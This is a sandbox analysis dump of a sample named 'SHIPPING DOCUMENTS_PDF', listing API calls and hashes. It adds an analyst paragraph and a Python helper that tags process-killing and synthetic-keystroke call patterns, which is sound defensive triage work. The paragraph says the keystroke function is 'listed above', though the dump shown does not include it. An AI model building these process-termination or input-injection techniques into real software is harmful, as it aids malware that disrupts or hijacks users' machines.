                                                                                    • Opcode Fuzzy Hash: 625366b552835ace5070bd8a233e1119dee8337a2a9c3fdd1686f6f476d62008
                                                                                    • Instruction Fuzzy Hash: EA915E71A00219EBEF24DFA5C888FAEB7F8EF85710F10859DF515AB280D7709945CBA4
                                                                                    APIs
                                                                                      • Part of subcall function 00BA710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?,?,00BA7455), ref: 00BA7127
                                                                                      • Part of subcall function 00BA710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7142
                                                                                      • Part of subcall function 00BA710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                                                                      • Part of subcall function 00BA710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?), ref: 00BA7160
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BC9806
                                                                                    • _memset.LIBCMT ref: 00BC9813
                                                                                    • _memset.LIBCMT ref: 00BC9956
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00BC9982
                                                                                    • CoTaskMemFree.OLE32(?), ref: 00BC998D
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 00BC99DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1300414916-2785691316
                                                                                    • Opcode ID: c1c7fca195d7e5a2a499da1edc1f49720730c7fda1a6bf3035116e5a3582d039
                                                                                    • Instruction ID: e220e46b6ca720f2399616ba46ca968407f4e3c98e6427bbd3bb53a240d3846d
                                                                                    • Opcode Fuzzy Hash: c1c7fca195d7e5a2a499da1edc1f49720730c7fda1a6bf3035116e5a3582d039
                                                                                    • Instruction Fuzzy Hash: 93911771D00229EBDB10DFA5DC85EDEBBB9EF09350F20419AF419A7291DB719A44CFA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BD6E24
                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BD6E38
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BD6E52
                                                                                    • _wcscat.LIBCMT ref: 00BD6EAD
                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BD6EC4
                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BD6EF2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 307300125-78025650
                                                                                    • Opcode ID: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                                                                    • Instruction ID: 54435105c8d705264a2a95915483222ea2d25cffa07e8da99b247ccd58f8900e
                                                                                    • Opcode Fuzzy Hash: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                                                                    • Instruction Fuzzy Hash: 61419171A00349ABEB21DF64CC85BEEB7E9EF08350F1044AAF585E72D1E6719D84CB60
                                                                                    APIs
                                                                                      • Part of subcall function 00BB3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
                                                                                      • Part of subcall function 00BB3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
                                                                                      • Part of subcall function 00BB3C55: CloseHandle.KERNEL32(00000000), ref: 00BB3D52
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9A4
                                                                                    • GetLastError.KERNEL32 ref: 00BCE9B7
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9E6
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCEA63
                                                                                    • GetLastError.KERNEL32(00000000), ref: 00BCEA6E
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BCEAA3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                                                                    • Instruction ID: 2c52e6d997bf8662f19e17aa5353e2a21a35734eef7b36b86a60e74455294348
                                                                                    • Opcode Fuzzy Hash: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                                                                    • Instruction Fuzzy Hash: B44176716042019FDB14EF24C8A5F6ABBE5AF41310F0884A9F9169B2D2DBB5E908CF95
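Two of the functions listed above are the ones an analyst would want to find quickly in a dump like this. The first (refs 00BA968E to 00BA96FB) attaches to the target window's input queue with AttachThreadInput and then posts WM_KEYDOWN (0x0100) and WM_KEYUP (0x0101) for VK_LEFT (0x25) and VK_RIGHT (0x27): synthetic keystrokes into another process's window. The second (refs 00BCE9A4 to 00BCEAA3) enumerates processes through a Toolhelp32 snapshot in a subcall, opens the target with dwDesiredAccess 0x00000001 (PROCESS_TERMINATE), calls TerminateProcess, and carries the string SeDebugPrivilege, so it can kill processes it does not own once that privilege is enabled. Both shapes are consistent with the AutoIt runtime's ControlSend and ProcessClose helpers, which matches the "Binary is likely a compiled AutoIt script file" signature; on their own they do not prove malicious intent, but a script payload can call them, so they are worth tagging. The following Python script is an added example written for this report. It is not Joe Sandbox code and not code recovered from the sample: it parses "APIs" bullet lines in the format shown on this page and tags those two call patterns. The sample inputs are copied from the two functions above; the tag names and the pattern table are the example's own convention.

```python
"""Triage helper for the 'APIs' bullet lists in a Joe Sandbox function dump.

Added example for this report; not Joe Sandbox code and not code from the
analysed sample. Parses lines such as
    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9A4
    • Part of subcall function 00BB3C55: CloseHandle.KERNEL32(00000000), ref: 00BB3D52
and tags two call patterns seen on this page. Tag names and the pattern table
are this example's own convention, not a Joe Sandbox signature.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

PROCESS_TERMINATE = 0x0001              # OpenProcess dwDesiredAccess bit
WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101   # PostMessageW Msg values

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"          # argument list is optional ('GetLastError.KERNEL32 ref: ...')
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple[str, ...]   # raw hex tokens; '?' means the sandbox could not resolve the value
    ref: str                # address of the call instruction
    subcall: str | None     # callee address when the line is a 'Part of subcall function' entry


def parse_api_lines(text: str) -> list[Call]:
    """Return one Call per bullet line in the report format; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def arg_int(call: Call, index: int) -> int | None:
    """Argument `index` as an int, or None when it is '?' or missing."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:
        return None


def tag_function(calls: list[Call], strings: frozenset[str] = frozenset()) -> dict:
    """Tag one function's call list (plus its Strings entries) with the patterns worth a look."""
    names = {c.api for c in calls}
    result: dict = {"tags": []}

    # Process enumeration through the Toolhelp32 snapshot API (here it sits in a subcall).
    if {"CreateToolhelp32Snapshot", "Process32FirstW"} <= names:
        result["tags"].append("toolhelp_enum")

    # OpenProcess requesting PROCESS_TERMINATE, with TerminateProcess in the same function.
    term_opens = [c for c in calls
                  if c.api == "OpenProcess" and (arg_int(c, 0) or 0) & PROCESS_TERMINATE]
    if term_opens and "TerminateProcess" in names:
        result["tags"].append("process_kill")
        result["open_process_refs"] = [c.ref for c in term_opens]
    if "SeDebugPrivilege" in strings:
        result["tags"].append("se_debug_privilege")

    # Synthetic keyboard input: attach to the target's input queue, then post key messages.
    # PostMessageW(hWnd, Msg, wParam, lParam): args[1] is the message, args[2] the virtual key.
    key_posts = [c for c in calls
                 if c.api == "PostMessageW" and arg_int(c, 1) in (WM_KEYDOWN, WM_KEYUP)]
    if "AttachThreadInput" in names and key_posts:
        result["tags"].append("synthetic_keys")
        result["virtual_keys"] = sorted({arg_int(c, 2) for c in key_posts if arg_int(c, 2) is not None})
    return result


# Sample inputs copied from the two functions listed in this report.
PROCESS_KILL_BLOCK = """\
  • Part of subcall function 00BB3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
  • Part of subcall function 00BB3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
  • Part of subcall function 00BB3C55: CloseHandle.KERNEL32(00000000), ref: 00BB3D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9A4
• GetLastError.KERNEL32 ref: 00BCE9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCEA63
• GetLastError.KERNEL32(00000000), ref: 00BCEA6E
• CloseHandle.KERNEL32(00000000), ref: 00BCEAA3
"""
PROCESS_KILL_STRINGS = frozenset({"SeDebugPrivilege"})   # that function's String ID entry

KEY_INJECT_BLOCK = """\
  • Part of subcall function 00BAA82C: AttachThreadInput.USER32(00000000,?,00BA9683,?,00000001), ref: 00BAA85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00BA968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00BA96AB
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00BA96D5
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00BA96F8
"""

if __name__ == "__main__":
    print(tag_function(parse_api_lines(PROCESS_KILL_BLOCK), PROCESS_KILL_STRINGS))
    print(tag_function(parse_api_lines(KEY_INJECT_BLOCK)))
```

The parser deliberately accepts the three line shapes the report uses (plain call, call without an argument list, and "Part of subcall function" entries), so the same function can be pointed at any other "APIs" block on this page. Tagging on the access mask rather than on the API name alone matters: OpenProcess with PROCESS_QUERY_INFORMATION is routine, OpenProcess with PROCESS_TERMINATE next to TerminateProcess and SeDebugPrivilege is not.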
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00BB3033
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                                                                    • Instruction ID: 279671bcd3049b663961749dc22a7862fc5ed97b8ff513e96bda0c3e07e1bf67
                                                                                    • Opcode Fuzzy Hash: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                                                                    • Instruction Fuzzy Hash: 9711053124C386BFE714AB14DC82EFB67DCDF19760B6080AAF904A61C1EAE06F4456A4
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BB4312
                                                                                    • LoadStringW.USER32(00000000), ref: 00BB4319
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BB432F
                                                                                    • LoadStringW.USER32(00000000), ref: 00BB4336
                                                                                    • _wprintf.LIBCMT ref: 00BB435C
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BB437A
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00BB4357
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 3648134473-3128320259
                                                                                    • Opcode ID: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                                                                    • Instruction ID: 20859626d56e952e0f7fbd7b6383b2f0537a4cb310b7a21ea06ab51e6c0d136f
                                                                                    • Opcode Fuzzy Hash: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                                                                    • Instruction Fuzzy Hash: 3A0162F2905209BFE71197A4DD89EF6B7ACEB08700F0045B2B74AE3051FA749E858B74
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00BDD47C
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00BDD49C
                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BDD6D7
                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BDD6F5
                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BDD716
                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00BDD735
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BDD75A
                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BDD77D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                    • String ID:
                                                                                    • API String ID: 1211466189-0
                                                                                    • Opcode ID: 00de61638db33172f6198430898606582c2abc46a677febbec9f17bff352dd2a
                                                                                    • Instruction ID: 3721af3fac14309b46839b6c91a9b704ef0eef80e718fb9bb4ebb757aedede5b
                                                                                    • Opcode Fuzzy Hash: 00de61638db33172f6198430898606582c2abc46a677febbec9f17bff352dd2a
                                                                                    • Instruction Fuzzy Hash: 0AB16A75600216EBDF14CF68C9D57ADBBF1FF04701F0880AAEC899B295E734A950CB90
                                                                                    APIs
                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B52ACF
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00B52B17
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C21A
                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C286
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    • Opcode ID: d3b72d7cdb9fb9c2b4e394d347761443ca554549a36acc9c62c0e6949840ede0
                                                                                    • Instruction ID: de069cde4ea2fa0b9d9a658cdb92d8343ab329911117e22a3638f6d3a93df752
                                                                                    • Opcode Fuzzy Hash: d3b72d7cdb9fb9c2b4e394d347761443ca554549a36acc9c62c0e6949840ede0
                                                                                    • Instruction Fuzzy Hash: DD41DB7160AA80DAD7399F28CCD8B7A7FD2EB8B311F1484D9E847475B1C671984DD720
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BB70DD
                                                                                      • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                      • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BB7114
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00BB7130
                                                                                    • _memmove.LIBCMT ref: 00BB717E
                                                                                    • _memmove.LIBCMT ref: 00BB719B
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00BB71AA
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BB71BF
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB71DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 256516436-0
                                                                                    • Opcode ID: 354aab277e1aac2e17c941ddc0de35be5b69f639d769feac49963326894dd560
                                                                                    • Instruction ID: 8e6dc94807faaa4660b303ef2cf182f9d24d7464a7e41fe4f9779cac4e0941c8
                                                                                    • Opcode Fuzzy Hash: 354aab277e1aac2e17c941ddc0de35be5b69f639d769feac49963326894dd560
                                                                                    • Instruction Fuzzy Hash: C2316F31904205EBCF10EFA4DC85AAFB7B8EF45710F1481B6F904AB256EB709E10CBA0
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BD61EB
                                                                                    • GetDC.USER32(00000000), ref: 00BD61F3
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD61FE
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00BD620A
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BD6246
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD6257
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BD902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00BD6291
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BD62B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                                                                    • Instruction ID: 58320627a38f12c6b31a765718c09a6c68eb357c8a950cf35cfc0ee56b52f80b
                                                                                    • Opcode Fuzzy Hash: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                                                                    • Instruction Fuzzy Hash: D5319F72101214BFEB108F10CC8AFFA7BA9EF49761F044066FE099B291EA759C41CB60
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                                                                    • Instruction ID: b65070f8860553911351b269b4db5a90976c6b27e3f48c14b463a08817441a34
                                                                                    • Opcode Fuzzy Hash: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                                                                    • Instruction Fuzzy Hash: 0C21D4716092057BA304672A9D82FBF73DDEE12358F0884E0FD28A6783FB24DE1185B1
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                    • _wcstok.LIBCMT ref: 00BBEC94
                                                                                    • _wcscpy.LIBCMT ref: 00BBED23
                                                                                    • _memset.LIBCMT ref: 00BBED56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                    • String ID: X
                                                                                    • API String ID: 774024439-3081909835
                                                                                    • Opcode ID: 3e5384bc82bd3a4a9dc984de0c762bcf3c6020137805b2c62fddb79aa7e3f889
                                                                                    • Instruction ID: 67d0dc75a47dbaf4c1cd542a69943d46c80cbc713d4ee4d5b67083b182488180
                                                                                    • Opcode Fuzzy Hash: 3e5384bc82bd3a4a9dc984de0c762bcf3c6020137805b2c62fddb79aa7e3f889
                                                                                    • Instruction Fuzzy Hash: B4C19271608700DFC764EF24D891AAAB7E0EF45311F0449ADF899972A1DB70EC49CB92
                                                                                    APIs
